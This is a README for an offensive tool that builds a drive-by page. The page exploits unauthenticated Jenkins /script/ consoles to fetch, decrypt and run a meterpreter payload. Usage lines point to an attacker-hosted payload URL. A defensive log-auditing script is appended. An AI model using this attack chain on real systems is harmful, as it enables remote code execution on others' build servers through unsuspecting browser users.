5l1v3r1 / generateJenkinsExploit


generateJenkinsExploit

This script generates an XSS page that exploits a Jenkins server whose /script/ endpoint is accessible without authentication. The /script/ page allows anyone who can reach it to execute Groovy script. The script also includes functionality for encrypting the executable payload.

htmlTemplate - the page that is generated for the attack. This is the page you direct the user to for the exploit. It performs the XHR requests to all local IP addresses and delivers the payload. Template parameter: $PAYLOAD$

payloadTemplate - the template for the Groovy script payload. It downloads the payload from the URL, decrypts it, writes it to disk and executes it. Template parameter: $PAYLOAD_URL$

Example usage:

./generateJenkinsExploit.py -e meterpreter

./generateJenkinsExploit.py -p http://<Your_IP>/meterpreter.encrypted
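
A detection-side counterpart to the browser-delivered /script/ request this README describes, as an added example that is not part of this repository: it scans web access logs for script-console requests that were served without an authenticated user or that arrived as a cross-site POST. The combined log format, the `audit` helper, the host names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format: src ident user [time] "METHOD path proto" status size "referer" "agent"
LINE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)
# Any path ending in /script or /scriptText, so a context prefix such as /jenkins is covered.
SCRIPT_PATH = re.compile(r'/script(?:Text)?/?(?:\?.*)?$')

def audit(lines, jenkins_hosts):
    """Return (line_no, source_ip, reasons) for suspicious script-console requests."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = LINE.match(line.strip())
        if not m or not SCRIPT_PATH.search(m["path"]):
            continue
        reasons = []
        # "-" in the user field means the server attached no authenticated identity.
        if m["user"] == "-" and m["status"].startswith("2"):
            reasons.append("script console served without an authenticated user")
        # A request issued by a page in a browser usually carries that page's Referer.
        ref_host = urlsplit(m["referer"]).hostname
        if m["method"] == "POST" and ref_host and ref_host not in jenkins_hosts:
            reasons.append(f"cross-site POST, Referer host {ref_host}")
        if reasons:
            findings.append((no, m["src"], reasons))
    return findings

# Constructed sample lines (hosts, users and addresses are made up).
SAMPLE = [
    '10.0.0.5 - alice [12/Mar/2024:10:00:01 +0000] "POST /script HTTP/1.1" 200 5120 "https://jenkins.example.internal/script" "Mozilla/5.0"',
    '10.0.0.23 - - [12/Mar/2024:10:02:17 +0000] "POST /script/ HTTP/1.1" 200 4870 "http://pages.example.net/index.html" "Mozilla/5.0"',
    '10.0.0.23 - - [12/Mar/2024:10:02:18 +0000] "GET /job/build-app/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '10.0.0.40 - - [12/Mar/2024:10:05:44 +0000] "POST /jenkins/scriptText HTTP/1.1" 403 312 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for no, src, reasons in audit(SAMPLE, {"jenkins.example.internal"}):
        print(f"line {no} from {src}: " + "; ".join(reasons))
```

The source address on a finding is the workstation whose browser issued the request, which is where triage starts.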

Disclaimer

This repository is for research purposes only, the use of this code is your responsibility.

I take NO responsibility and/or liability for how you choose to use any of the source code available here. By using any of the files available in this repository, you understand that you are AGREEING TO USE AT YOUR OWN RISK. Once again, ALL files available here are for EDUCATION and/or RESEARCH purposes ONLY.
